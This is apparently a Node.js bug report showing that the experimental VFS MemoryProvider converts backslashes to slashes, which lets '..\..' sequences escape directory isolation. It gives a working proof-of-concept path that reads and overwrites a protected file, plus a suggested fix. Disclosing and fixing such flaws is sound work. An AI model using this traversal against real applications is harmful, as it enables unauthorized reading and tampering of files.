node:vfs MemoryProvider: backslash in path allows directory traversal

[jojin1709]

Environment

• Node.js: v27.0.0-nightly20260625c5635b82c9
• Flag: --experimental-vfs
• OS: Linux

Description

MemoryProvider#normalizePath() in lib/internal/vfs/providers/memory.js converts backslashes to forward slashes before calling pathPosix.normalize(). This allows .. traversal via backslash-encoded paths, bypassing directory isolation within the VFS virtual tree.

Root cause (lib/internal/vfs/providers/memory.js):

let normalized = StringPrototypeReplaceAll(path, '\\', '/');
return pathPosix.normalize(normalized); // resolves .. after backslash→/ conversion

Reproducer

// node --experimental-vfs poc.js
const vfs = require('node:vfs');
const fs = vfs.create(new vfs.MemoryProvider());

fs.mkdirSync('/admin');
fs.writeFileSync('/admin/secret', 'CONFIDENTIAL');
fs.mkdirSync('/user/data', { recursive: true });
fs.writeFileSync('/user/data/public.txt', 'public');

// Read traversal: /user/data\..\..\admin/secret → /admin/secret
console.log(fs.readFileSync('/user/data\\..\\..\\admin/secret', 'utf8'));
// Output: CONFIDENTIAL

// Write traversal
fs.writeFileSync('/user/data\\..\\..\\admin/secret', 'OVERWRITTEN');
console.log(fs.readFileSync('/admin/secret', 'utf8'));
// Output: OVERWRITTEN

Expected behavior

Paths containing backslashes should either be rejected or treated as literal filename characters (as Linux does), not converted to path separators.

Suggested fix

Remove the backslash-to-slash conversion in #normalizePath(), or reject paths containing backslashes with an EINVAL error.